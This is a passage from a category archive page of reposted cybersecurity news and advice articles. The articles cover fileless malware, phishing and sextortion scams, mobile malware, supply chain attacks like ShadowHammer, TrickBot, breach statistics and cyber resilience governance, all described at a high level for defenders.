Category Archives: threat detection

How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

The combination of all of these code sources is generally called process hollowing — a tactic in which malware uses a particular process as a storage container and distribution mechanism for its code. One recent attack discovered by FireEye combined PowerShell, VB scripts and .NET in a single lethal package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based exploits can be, since code is executed directly from a PC’s memory. Plus, PowerShell can be used for remote access attacks and get around application whitelisting protections.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first tenets of threat actors is taking advantage of unpatched, older systems, to delay patch management is to introduce a vulnerability into your network. The spread of EternalBlue illustrated this well; the patch was available for more than a month before the exploit was launched.

The next step is to ensure you have a solid security awareness training regimen. This doesn’t mean running annual exercises or sending out the occasional test phishing email. Instead, come up with a program that operates continuously and is always making users aware of the dangers of email attachments and clicking on links willy-nilly. Most fileless campaigns begin their life with a simple phishing email, so it is important to try to nip these entry points quickly.

Third is to understand the behavior of built-in Windows code so you can spot anomalies, such as when encrypted PowerShell scripts are installed to run as a service. The combination of the two — the encryption and the service feature — should be a red flag. Analysts sometimes see compression tools instead of or in addition to encryption as well. Another red flag is finding a PowerShell script hiding in the \TEMP directory; while not technically fileless, this code quickly moves to more dangerous parts of the operating system (OS).

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because you have a user who clicked on a malicious attachment doesn’t mean the malware will stay on their PC. Instead, a typical behavior is for the malware to move across your network to find a richer target, such as a domain controller or web server. To prevent this, you should segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common attack method is escalating privileges as malware moves around the network, which can be done using PowerShell, for example. They don’t call it PowerShell for nothing: An actor can issue commands for reverse Domain Name System (DNS) queries, enumerate access control lists on any network share and find members of a particular domain group. This means one of the more basic controls for any malware is to restrict administrator rights to the minimum number of systems.

Many fileless exploits count on the profligate use of rights that aren’t needed or are attached to users that have since left the company, or outdated rights for users who don’t access the targeted applications anymore. Companies should develop methods to detect when these situations occur and be able to shut them down quickly. Organizations should also disable Windows programs that aren’t needed. Not everyone needs PowerShell running on their computer, or support for the .NET framework. Even more effective is to eliminate support for ancient protocols such as SMBv1, which was what caused all the trouble with WannaCry.

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legit app has been observed doing. Another way is to disable macros, including Office macros, which are often abused by malware writers, although this isn’t a universal solution because many users do need them to do their jobs.

As a side note, Windows can be used for more than just desktop computers, and threat actors will sometimes target embedded Windows point-of-sale (POS) machines. The attraction here is that these computers have direct access to payment card data, so having extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. In fact, the company has developed an open interface called Antimalware Scan Interface that some vendors have begun using to make it easier to detect the “tells” of the fileless world, especially when it comes to analyzing scripting behavior.

In addition, anyone who wants to gain a better understanding of fileless attacks should check out the open source project AltFS. This is a complete fileless virtual file system to demonstrate how these techniques work, and it can be deployed on Windows and Mac PCs.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.

The post How to Defend Your Organization Against Fileless Malware Attacks appeared first on Security Intelligence.

The State of Security: Managed Vulnerability Management? Yes, You Read That Right

The importance of a mature vulnerability management program can’t be overstated. File integrity monitoring (FIM) and security configuration management (SCM) might be the bedrock of a strong cybersecurity program, but they can only go so far. Scanning for vulnerabilities needs to be a foundational part of your program, too. The Center for Internet Security (CIS) […]… Read More

The post Managed Vulnerability Management? Yes, You Read That Right appeared first on The State of Security.

The State of Security

Managed Vulnerability Management? Yes, You Read That Right

The importance of a mature vulnerability management program can’t be overstated. File integrity monitoring (FIM) and security configuration management (SCM) might be the bedrock of a strong cybersecurity program, but they can only go so far. Scanning for vulnerabilities needs to be a foundational part of your program, too. The Center for Internet Security (CIS) […]… Read More

The post Managed Vulnerability Management? Yes, You Read That Right appeared first on The State of Security.

Sextortion Scammers Enhance Attack Campaigns With Image Spam, Other New Techniques

Security researchers observed sextortion scammers launching new attack campaigns that leverage image spam and other clever techniques to trick users into fulfilling their demands.

According to Cisco Talos, attackers are currently using several different tactics to make their emails evade detection by anti-spam filters. Some of these methods aren’t entirely new. For instance, some attackers are using image spam, a technique that goes back to at least 2005, by sending along only an image of a sextortion-based ransom note.

The problem with this approach, however, is that victims can’t follow the note’s instructions or copy the attacker-owned bitcoin address included in the image. This snag lowers the chances of the attackers receiving payment.

Some of the tactics are more recent. For instance, some threat actors are seeking to trick anti-spam filters by using a combination of usernames in comments, plaintext letters and HTML characters. Others are sending along ZIP files that purport to contain evidence of the attackers having compromised the target’s computer.

Cisco Talos researchers weren’t able to examine the contents of these password-protected archives, but they believe that any files included likely consist of junk data.

New Attack Waves, New Techniques

Sextortion scammers have been busy since at least July 2018, when researchers discovered the first attack waves. As reported by Krebs on Security, those emails leveraged passwords already compromised in publicly disclosed data breaches to trick users into fulfilling the attacker’s demands. One month later, Naked Security spotted another wave using redacted phone numbers toward the same end.

Since then, cybercriminals have grown increasingly more creative. For instance, Proofpoint observed one wave that attempted to infect users’ computers with GandCrab ransomware. Another variant relied on a fake CIA investigation to scare users into paying, as reported by Tripwire.

How to Defend Against Sextortion Scams

Security professionals can help defend their organizations against sextortion scams by using ahead-of-threat detection to spot potentially malicious domains before threat actors have the chance to use them against employees.

As always, organizations should also create an ongoing security awareness training program that teaches users to be on the lookout for social media scams and other ruses such as sextortion-based ploys.

The post Sextortion Scammers Enhance Attack Campaigns With Image Spam, Other New Techniques appeared first on Security Intelligence.

Phishing Campaign Makes Use of SingleFile Browser Extension Tool to Obfuscate Malicious Activity

In a recent phishing campaign, fraudsters used a legitimate browser extension tool called SingleFile to obfuscate their attacks and remain undetected.

According to Trend Micro, the malicious mail campaign started on Feb. 27 and utilized SingleFile, a web extension for Google Chrome and Mozilla Firefox that allows users to save webpages as single HTML files. As such, SingleFile is designed to help streamline the process by which users can archive webpages.

Threat actors abused SingleFile’s legitimate functionality, however, by copying the login pages of legitimate webpages, such as those of the payment processing website Stripe. Though simple, this spoofing method enabled the attackers to generate almost an identical copy of the legitimate website’s login mechanism, which they could then use to phish for users’ credentials. This attack technique came with an added bonus in that it hid the login form’s HTML code as well as the JavaScript used by the legitimate login page from detection by static security tools.

Attackers’ Growing Abuse of Legitimate Tools

As noted by Symantec, threat actors are increasingly living off the land in that they’re using tools already installed on a computer and running simple scripts or shellcode directly into memory as part of their campaigns. As with the use of SingleFile identified above, these tactics help attackers evade detection.

Fraudsters are also now obtaining digital certificates to add a sense of legitimacy to their phishing pages. According to Krebs on Security, just under half (49 percent) of phishing sites now come with the green padlock in the address bar, an icon that is indicative of a secure web connection.

How to Defend Against SingleFile Phishing Campaigns

Security professionals can help defend their organizations against a phishing campaign by using ahead-of-threat detection to filter out potentially malicious domains based on WHOIS information and other intelligence feeds. Security teams should also develop an ongoing security awareness program and customize training to the unique needs of the organization.

The post Phishing Campaign Makes Use of SingleFile Browser Extension Tool to Obfuscate Malicious Activity appeared first on Security Intelligence.

Fraudsters Seize on March Madness Fervor With Phishing Attacks, Streaming Scams

Online fraudsters are exploiting users’ excitement for March Madness by targeting them with phishing attacks and streaming scams.

Zscaler researchers came across multiple phishing websites after searching Google for free livestreams of “March Madness,” the colloquial name for the annual NCAA Division I Men’s Basketball Tournament. One such site, streamcartel[.]org, contained adware on each of its pages. Whenever a user clicked anywhere on the page or attempted to close one of the malicious ads, a new tab opened and prompted the user to install a fake browser extension.

The security firm also found malicious activity on sawlive[.]tv. This phishing site used sporting events to attract users into visiting and then bombarded them with malicious ads. One such ad redirected users to a fake Windows security warning page.

Zscaler’s research also turned up several typosquatting domains that used terms associated with the NCAA Tournament to prey upon unsuspecting users. With thousands of people rushing to watch the games online, it’s easy to imagine some fans clicking on malicious links without thinking twice.

Streaming Scams Are Common in March

Given the relatively high success rate of social engineering campaigns, March Madness-themed cyberattacks are unsurprisingly common this time of year.

In March 2017, for example, Zscaler detected attackers using phishing sites that used the popularity of March Madness to target employees with adware. These malicious ads, in turn, tricked users into installing browser hijackers and other potentially unwanted applications. And in 2018, WXYZ reported that Michigan Attorney General Bill Schuette had issued an alert warning users to be on the lookout for scammers pushing fake March Madness tickets.

How to Stop the Madness of Topical Phishing Attacks

Threat actors have a history of creating phishing attacks around topical events such as March Madness. Acknowledging that reality, security professionals should help defend their organizations with ahead-of-threat detection to detect potentially malicious domains before the threats themselves become visible.

Additionally, companies should create a security awareness training program that, among other things, teaches employees about some of the most common types of social media scams and social engineering tactics.

The post Fraudsters Seize on March Madness Fervor With Phishing Attacks, Streaming Scams appeared first on Security Intelligence.

Preparing for the Unpredictable: Security in a New World of Mobile Malware

Mobile malware is nothing new. But in recent months, attackers have been getting more creative and resourceful with how they conceal, distribute and deploy these threats.

This newfound creativity is part of a mobile threat trend that can be summarized as follows: Attacks are on the rise, they’re focusing on mobile devices and they’re getting far more aggressive with their methods.

Mobile Threats by the Numbers

The numbers are staggering. Kaspersky Lab’s “Mobile Malware Evolution 2018” report found that the number of devices attacked by malware increased from 66.4 million in 2017 to 116.5 million in 2018 — and we should assume another big rise for 2019. The researchers also found that the “quality” of malware — its precision and impactfulness — is on the rise. The number of so-called “Trojan-droppers” — malware that gets past security to deliver its payload — doubled from 2017 to 2018, according to the report.

In its most recent “Mobile Threat Report,” McAfee detailed how mobile phones are being increasingly targeted with mobile app backdoors, banking Trojans and cryptomining malware. One alarming trend is the number of fake apps appearing in dozens of app stores, raising from around 10,000 fake apps in the middle of 2018 to approximately 65,000 by the end of the year.

In addition, Verizon’s most recent “Mobile Security Index 2019” found that a majority of those surveyed believed their organization is at risk of mobile threats. One-third of companies reported suffering a compromise that involved mobile devices. Despite this, more than half said they had sacrificed security to “get the job done.” An incredible 81 percent of respondents said they had personally used insecure public WiFi for work, despite knowing that the practice is both unsafe and prohibited by company policy.

All this is to say that the threat from mobile devices is increasing at an extremely high rate, yet most organizations are woefully unready.

A New World of Mobile Malware

All that data around the rising threat of mobile-based attacks doesn’t fully address the quality of the latest malware. Just look at the creative thinking behind a recent incarnation of malware called Anubis.

Anubis’ Motion-Based Evasion Tactics

Distributed inside at least two apps available on the Google Play store, Anubis banking malware concealed itself using the target phones’ motion sensors. Researchers often use emulators to hunt for Trojans in apps — or they search on real phones, which are often mounted and motionless. The Anubis creators figured out that one difference between security researchers and real-life users is motion. By activating only after motion was detected, the malware could remain invisible to many researchers but still activate on phones in the wild.

Trend Micro reported in January that the motion-activated Anubis appeared in two seemingly legitimate apps: a battery extender app with a 4.5-star rating and a currency converter. Once activated, Anubis installed a keylogger for stealing credentials or took screenshots for the same purpose.

Preinstalled Mobile Malware

Downloading apps is one way to sneak malware onto phones. Preinstalling it is another. The technology firm Upstream discovered in January that the Alcatel smartphone models Pixi 4 and A3 Max contained malware out of the box. The malware was hidden in a preinstalled weather app called Weather Forecast-World Weather Accurate Radar. The app was also available separately on the Google Play store and was downloaded more than 10 million times. It has since been removed.

The malware collected various bits of data, such as location data, user email addresses and International Mobile Equipment Identity (IMEI) numbers and may have loaded adware. It also subscribed users to a for-pay phone number service.

Clipper Malware on Google Play

Another unwelcome trend is the appearance of older methods of compromise in legitimate app stores. For example, the first clipper malware ever discovered on the official Google Play store was found by the security company ESET in February: Android/Clipper.C. Previously, clipper malware was the exclusive province of desktop PCs or unauthorized app stores.

Clipper apps replace the clipboard contents of a device with other data. For example, a clipper app might switch the account for a deposit during a cryptocurrency transaction, redirecting the transaction to the attacker’s account.

In addition, Android/Clipper.C attempted to nab credentials and private keys and send them to the attacker’s Telegram account to steal Ethereum funds, but it could also replace either an Ethereum or a bitcoin wallet address.

Attack Campaigns on a Massive Scale

Yet another new trend is that some malware is being distributed on a massive scale. Some 150 million Android users were impacted recently by malware called SimBad. The malware disguises itself as advertising, according to Check Point, mostly inside a large number of mobile games.

In fact, SimBad carries out phishing attacks that lead users to websites where even more malware is downloaded. Once launched, SimBad is difficult to stop or uninstall. Apps containing the SimBad malware have since been removed from the store.

Distributing Malware via Image Files

Malware can even be smuggled onto a phone without apps. A new Android bug enabled a standard photo file format to serve as the vehicle for an attack. Google discovered the method, fixed it with a February patch, then described it in a security bulletin. The flaw enabled hacks of Android smartphones via PNG files by way of a purpose-built PGN that could execute code. It’s worth noting that the vast majority of Android phones are not updated frequently and did not get the patch quickly.

What Can We Do to Combat Creative New Malware Strains?

The bottom line is that mobile malware techniques to compromise security cannot be easily predicted. What can be predicted is that threats will continue to rise, new methods will continue to be devised and mobile devices will continue to be the focus of intense malware activity.

The point of all this is not to guard specifically against the examples in this article, but to understand the growing threat — and reflect on the fact that far too many organizations are unprepared. So what can they do to prepare for the unpredictable?

To get started, here are some mobile security best practices and policies to follow and enforce:

  • Keep devices current with the latest updates.

  • Stick to official and authorized app stores. While many of the threats reported here actually appeared on the official Google Play store, it’s important to note that affected apps are removed immediately once discovered. The same can’t be said for unauthorized sources for mobile apps.

  • Minimize the number of apps installed and favor reputable app developers.

  • Embrace a comprehensive approach to mobile security that can protect against even unreported or unpredicted threats.

  • Understand that some of the newest threats can only be stopped with powerful artificial intelligence-based tools.

  • Improve and enforce policies against using public WiFi and in favor of using good password management.

Nobody can predict how creative new malware methods will infiltrate the mobile devices used by employees at your organization. But it’s easy to predict that these attempts will be made. Security decision-makers can no longer think about these threats as theoretical or secondary in importance to other work. It’s time to act on what we know is coming: something unpredictable.

The post Preparing for the Unpredictable: Security in a New World of Mobile Malware appeared first on Security Intelligence.

As fraud attacks grow more sophisticated, a need for contextual detection strategies increases

Fraudsters are using a complex array of tools to build armies of fake accounts, 74% of all fraudulent accounts are created from desktops, and cloud service provider IP ranges are at a higher risk. How fraudsters behave Fraudsters rely heavily on cloud datacenter IP ranges and cloud services are becoming a favorite attack tool; whether to mask the true origin of fraudulent accounts or to easily orchestrate attacks at scale by exploiting virtual servers, according … More

The post As fraud attacks grow more sophisticated, a need for contextual detection strategies increases appeared first on Help Net Security.

To Move Forward Securely, Look Backward With Ongoing Risk Assessments

As security professionals, we’re constantly on the lookout for the latest research and trends to stay on top of new threats. This is sensible in that novel attacks seem most likely to go undetected, but if we focus on the future at the expense of performing risk assessments to maintain defenses against existing threats, we will always be one step behind attackers.

It’s said that history doesn’t repeat itself, but it often rhymes. This is particularly true with cybercrime. As we’ve watched malware trends shift from one generation of technology to the next, it’s clear that old techniques are often reused.

Legacy Code, Current Security Problems

Technology moves quickly, and most organizations have a lot on their plates dealing with a constant influx of new apps and devices. Each new wave of changes brings a new codebase and a new attack surface. It’s reasonable to take these risks seriously, but in this constant race to address new threats, we can accrue security debt that opens us up to threats that have not been completely addressed in older technology.

While it’s well-known that updating software is a key part of keeping the organization secure, this is not always practical. Most companies have legacy technology that must be kept for one reason or another, often because it’s too expensive or difficult to replace. Millions of computers are still using antiquated software, much of which is known to be problematic. For example, according to Statcounter, Windows XP still has around 2 percent of the global desktop Windows version market share, and Windows 7 — which will no longer be supported after 2019 — still has around 34 percent.

Even code that’s current, has been in use for years and is considered safe can sometimes hide major problems. There are plenty of examples from recent years in which vulnerabilities were found in code that was in active use for years or even decades, such as Heartbleed, Shellshock, Meltdown and Spectre.

From a return on investment (ROI) perspective, it makes sense for criminals to spend as little time and effort as possible creating new attacks when existing problems can easily be exploited. Old malware and vulnerabilities linger on a surprising number of systems.

Old Attack Types Resurface

Threat actors aren’t just recycling old vulnerabilities and malware; they are also fond of reusing old attack vectors, particularly those that have been off the industry’s radar for so long that we forget they’re a problem.

For example, boot sector viruses and macro viruses were once considered all but dead, as heuristic detection became so effective that even brand new malware was usually identified as soon as it was released. But once attackers rediscovered these techniques, a new generation of malware researchers had to resurrect skills from the past to reverse engineer these threats. As Krebs on Security reported last year, even malware sent by snail mail has made a bizarre reappearance.

The Pattern Repeats in New Devices

Sometimes old attacks are ported to new operating systems and devices, which are perceived as less threat-prone than more traditional computers. Malware authors have had years of practice porting Windows threats to other operating systems, and attacks have been carried out on everything from mobile phones to internet-connected refrigerators.

Researchers have been predicting internet of things (IoT) security issues for almost 20 years, due in large part to device manufacturers failing to learn the lessons of the past. Yet many “smart” devices fail to follow basic IoT security best practices, including using default login credentials and failing to include software update capabilities.

Start Addressing Security Debt With Ongoing Risk Assessments

The good news is that many of the techniques that help with addressing security debt will also help mitigate the problems that could come with new threats. Perhaps the best strategy is to conduct thorough and ongoing risk assessments to identify which assets and vulnerabilities are present in your environment. You can then move on to mitigating the biggest risks for different kinds of devices and code.

For Old Code or Devices

Identify and update what you’re able to. For things that you’re unable to update, it’s best to harden the machines as much as possible and monitor them closely. This hardening may include segregating these devices from the rest of your network, limiting the privileges of the device and/or using white lists.

For Newer IoT Devices

If at all possible, purchase devices that were built with security in mind. This should include, at a minimum, the ability to change usernames and passwords as well as software update mechanisms. Ask vendors to practice security by design principles as outlined by the Open Web Application Security Project (OWASP). You can also put risky devices on segregated portions of your network while monitoring traffic in and out of these areas.

For Everything Else

New devices with updated software can still fall victim to old attack techniques. It’s important to make sure you’re covering the basics, such as practicing good password hygiene and using a reputable security suite. But there are other protection steps you should also be taking.

For instance, use layers of defense wherever possible, such as multifactor authentication to protect login credentials rather than just a username and password. Set security policies and procedures and make sure your users are briefed on them early and often. Tailor your practices so that the people in your environment are able to do what they need to without undue trouble, but also without allowing more privileges than are truly necessary.

Invest Wisely to Combat Both Old and New Threats

Protecting a network can be a costly and difficult endeavor if you apply tools blindly in fear of future problems. Spend your security investments more wisely by regularly and thoroughly assessing which assets you have to protect and mitigate any risks to those assets — whether they’re old or new vulnerabilities. You don’t need to have the most newfangled technology to make your environments an unattractive target for cybercriminals.

The post To Move Forward Securely, Look Backward With Ongoing Risk Assessments appeared first on Security Intelligence.

15% of enterprises have experienced a targeted attack

Kaspersky Lab’s paper helped shed light in ways to identify the attacker, making well-informed and strategic ways of threat detection. The cyber security market in India is growing exponentially, and is

The post 15% of enterprises have experienced a targeted attack appeared first on The Cyber Security Place.

Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches

The first quarter of every year produces dozens of reports that both reflect on the threats of the previous year and look ahead to understand how to avoid future security breaches. No single report can offer a foolproof approach to data protection, but the findings in the Identity Theft Resource Center (ITRC)’s “2018 End-of-Year Data Breach Report” serve as a stark reminder of why companies should take a layered approach to security.

A notable and somewhat confounding takeaway from the report was that, despite fewer reported data breaches compared to the previous year, 2018 saw a 126 percent uptick in the number of records breached containing personally identifiable information (PII). In many cases, these breaches were the result of the continued use and reuse of passwords and usernames, as well as vulnerabilities caused by third-party vendors.

How can industry leaders turn last year’s surge in stolen records into a record-breaking year of cybersecurity success?

The Perfect Cyber Threat Storm

Unfortunately, a lack of resources in budget and skilled staff remain the top reasons why many organizations lag in their overall security postures. All the while, though, today’s cybercriminals are increasingly monetizing their activities in various creative ways.

Additionally, the report found that consumers are continuing to choose convenience over security, believing that it is the business’ responsibility to protect the data it collects. That’s why only safeguarding networks is not enough, according to Byron Rashed, vice president of marketing at Centripetal Networks.

“It’s a combination of layered security best practice and user cybersecurity education that will greatly mitigate risk,” said Rashed. “From phishing to ransomware, the attackers’ schemes have become more complex and, in many circumstances, extremely damaging. Add into the equation human error and you now have the perfect cyber threat storm.”

A Familiar Weather Pattern of Data Breaches

What some might see as the brewing of a perfect threat storm, others recognize as a familiar threat. Here, the old adage that hindsight is 20/20 rings true, and it gives defenders a slight advantage. Armed with the insight of what went wrong last year, security professionals can be more proactive in building defense in depth. The enormous jump in the number of exposed sensitive records indicates that organizations should strengthen their data privacy efforts. Looking at a breakdown of the types of compromises from the ITRC report, 39 percent of breaches resulted from hacking and 30 percent resulted from unauthorized access.

Understanding attack methods will inform mitigation, but it’s also important to push through fear, uncertainty and doubt to see that things may not be as bleak as they appear. After all, the report did find that the actual number of data breaches fell by 23 percent from 2017. The business industry, which had the largest number of breaches, also had the least number of records exposed.

“Yes, hackers continue to succeed at stealing more records, but really, how many times can they steal the same Social Security number?” said John Gunn, chief marketing officer at OneSpan. “More importantly, the methods for verifying the identity for someone conducting a remote digital transaction have experienced huge gains in the past year with biometric and behavioral techniques enhanced by artificial intelligence (AI).”

While threat actors may be getting more data, banks and merchants are getting better at stopping the fraud these cybercriminals would otherwise commit with that compromised data, according to Gunn. By sharing massive amounts of information, financial institutions can leverage AI, machine learning-based analyses and anti-fraud platforms to enable the detection of new malware threats and previously hidden attacks in real time.

Build a Foundation of Proactive Cybersecurity Measures

There is arguably no way to say that any particular security strategy can completely prevent a cyberattack, but there are many ways companies can prepare for threats so they are better able to detect and respond to cyberattacks when they do happen.

“Organizations need to build a foundation of proactive measures, such as frequent employee training, preventative security controls and staying up to date with industry best practices,” said Andy Wright, regional director, Northern Europe for Check Point.

Because innovation is moving so swiftly, keeping abreast of industry best practices can seem like a full-time job on its own. Added to that is the reality that attackers are constantly evolving their campaigns, often exploiting zero-day vulnerabilities with attacks that have no known signature — meaning they evade the detection of most antivirus tools.

Making everyone within the organization aware of security risks to the company will help create a security-aware culture in which end users are encouraged to report security issues without the fear of negative consequences. “Reporting a human error early on can help identify and prevent intrusions, which will stop the attack earlier in the kill chain,” said Chad Cragle, information security officer at FormAssembly. If employees feel that their jobs are not at risk for reporting human errors, they are more inclined to share useful information with the security team.

Part of training employees includes education about spear phishing and common malware exploits so that workers are familiar with and better able to identify these threats — and also less likely to fall victim to newer, emerging threats. When employees know what to look for, they are more risk-aware and more likely to report errors early on.

In addition, implementing password updates and two-factor or multifactor authentication will help mitigate the risk of unauthorized access to systems and resources.

“This can be supported by using encrypted PCs and devices. These measures should also be extended to third-party vendors to ensure they’ve enabled the proper security protocols that prevent hackers from accessing their network and jumping across,” Wright said.

Fight the Storm With a Layered Approach to Security

Organizations can build defense in depth through a layered approach to security, which includes intrusion prevention and threat detection and response tools, encryption, access controls, and data loss prevention tools. Because security is not only about technology, it’s also important to think about defense as it relates to people and processes. Another critical piece of preventing and blocking threats is having clear policies that are tested and consistently updated, particularly when it comes to risk management and software updates.

If your security program has all these aspects, you’re well on your way to helping make 2019 a record-breaking year of cybersecurity success.

The post Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches appeared first on Security Intelligence.

Operation ShadowHammer Supply Chain Attack May Have Distributed Backdoor to 1 Million-Plus Users

Security researchers believe a supply chain attack known as Operation ShadowHammer may have distributed a backdoor to more than 1 million users.

Kaspersky Lab first discovered Operation ShadowHammer back in January 2019. The attackers behind the campaign directed their supply chain attack against the ASUS Live Update software, a utility that comes preinstalled on most computers built by ASUS. The software automatically receives updates for certain components, such as the Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI) and other applications.

Kaspersky Lab observed 57,000 users of its security products who had installed the backdoor on their machines. The security firm can’t calculate the total number of users affected by the attack from just its own data, but it estimated that the campaign could have affected at least 1 million users. Even so, Kaspersky Lab found in its analysis that the likely goal of Operation ShadowHammer was to target an unknown pool of users via their network adapters’ media access control (MAC) addresses.

The Dangers of a Supply Chain Attack

Operation ShadowHammer isn’t the only sophisticated supply chain attack that’s emerged in the past few years. In September 2017, researchers at Morphisec reported that threat actors had succeeded in covertly modifying the Avast-owned security application CCleaner with a backdoor. This attack subsequently linked as many as 2.27 million users to a server under the attackers’ control.

A few months prior, wiper malware known as Nyetya/NotPetya affected many organizations and multinational corporations operating in Ukraine. Researchers at Cisco Talos launched an investigation into some of the key aspects of this outbreak and discovered that malefactors had conducted a supply chain attack against MeDoc, the makers of a Ukranian accounting software package, to produce a malicious update disguised as ransomware and serve this payload to the software’s users.

Blocking Attacks Like Operation ShadowHammer

Security professionals can help defend against campaigns similar to Operation ShadowHammer by continuously monitoring their third-party connections. In doing so, security personnel should use firewall rules and other common methods to stay on the lookout for inbound connections.

Organizations should also invest in an artificial intelligence-based detection solution that can analyze networks for suspicious behaviors that a human eye might miss and protect the organization against sneaky digital threats like zero-day malware.

The post Operation ShadowHammer Supply Chain Attack May Have Distributed Backdoor to 1 Million-Plus Users appeared first on Security Intelligence.

TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks

Security researchers warned that the cybercriminals behind the two banking Trojans are now collaborating to perform man-in-the-middle (MitM) attacks.

On March 17, Crowdstrike discovered a BokBot proxy module called shadDll in conjunction with TrickBot. The code for the two banking Trojans is 81 percent similar, the researchers said, which means the proxy module can be seamlessly integrated into TrickBot’s extensible, modular framework. It’s possible the two threat groups have been collaborating on an ongoing basis, the researchers added.

Adding New Features Through Threat Group Collaboration

After infecting a machine by duping victims into installing malware via phishing messages, TrickBot can use the shadDll module to access networking functions and install illegitimate secure socket layer (SSL) certificates. At this point, it can do many of the things BokBot can do, including intercepting web traffic and redirecting it, taking screenshots to steal personal information, and injecting other malicious code.

The researchers have attributed the BokBot Trojan to a cybercriminal group called Lunar Spider, while TrickBot is believed to have been created by a group called Wizard Spider. TrickBot, which first emerged in late 2016, has proven highly versatile in attacking financial services firms, and Wizard Spider may include members of the group that developed the earlier Dyre malware, according to Crowdstrike.

How to Stay Ahead of TrickBot’s Tricks

The “IBM X-Force Threat Intelligence Index” for 2019 identified TrickBot as the most prevalent financial malware family of last year, representing 13 percent of all campaign activity. This was in part due to the ability of various threat actors to make use of the Trojan’s variants. For example, the report showed that IcedID distributed TrickBot within its own botnet in a 2018 campaign. However, experts noted that proper security controls, regular user education and planned incident response can help keep this threat at bay.

X-Force researchers also discovered that TrickBot has been used to steal cryptocurrency, and distribution of the BokBot module may make it even more popular. Organizations should employ advanced malware protection to receive alerts for high-risk devices and notifications when malware has been detected to ensure this cooperation among cybercriminals doesn’t lead to even deadlier attacks.

The post TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks appeared first on Security Intelligence.

What worries you the most when responding to a cybersecurity incident?

The clock starts ticking immediately following a cybersecurity incident with the first 24 hours vital in terms of incident response. The majority (59 percent) of companies are not confident they could resume ‘business as usual’ after the first 24 hours, although 41 percent say they are, according to a new social media poll by NTT Security. Asked about their number one focus in the first 24 hours after a security incident, nearly two-thirds (64 percent) … More

The post What worries you the most when responding to a cybersecurity incident? appeared first on Help Net Security.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly makes way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
